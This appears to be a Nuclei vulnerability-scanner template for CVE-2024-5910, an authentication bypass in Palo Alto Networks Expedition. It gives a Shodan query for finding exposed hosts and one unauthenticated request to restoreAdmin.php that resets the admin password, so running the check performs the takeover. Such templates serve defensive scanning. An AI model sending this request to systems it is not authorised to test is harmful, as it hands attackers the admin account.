id: CVE-2024-5910 info: name: Palo Alto Expedition - Admin Account Takeover author: johnk3r severity: critical description: | Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition. impact: | Attackers with network access can exploit missing authentication to takeover Expedition admin accounts without credentials. remediation: | Update Palo Alto Networks Expedition to the latest version that patches CVE-2024-5910 as specified in the Palo Alto security advisory. reference: - https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise - https://security.paloaltonetworks.com/CVE-2024-5910 - https://nvd.nist.gov/vuln/detail/CVE-2024-5910 classification: cve-id: CVE-2024-5910 cvss-score: 9.3 cwe-id: CWE-306 epss-score: 0.91029 epss-percentile: 0.99653 metadata: verified: true max-request: 1 vendor: paloaltonetworks product: expedition shodan-query: http.favicon.hash:1499876150 tags: cve,cve2024,palo-alto,auth-bypass,kev,vkev,vuln http: - method: GET path: - "{{BaseURL}}/OS/startup/restore/restoreAdmin.php" matchers-condition: and matchers: - type: word words: - "Admin user found" - "Admin password restored" condition: and - type: status status: - 200 # digest: 490a0046304402202fc3d567f8dce9c1fbce46558eb8527782bdbd288633e44e08d39965c50cac2102204fa84152ed189bd663d4b337445717a12147f324bcba2bca544c87e04c81e8c8:922c64590222798bb761d5b6d8e72950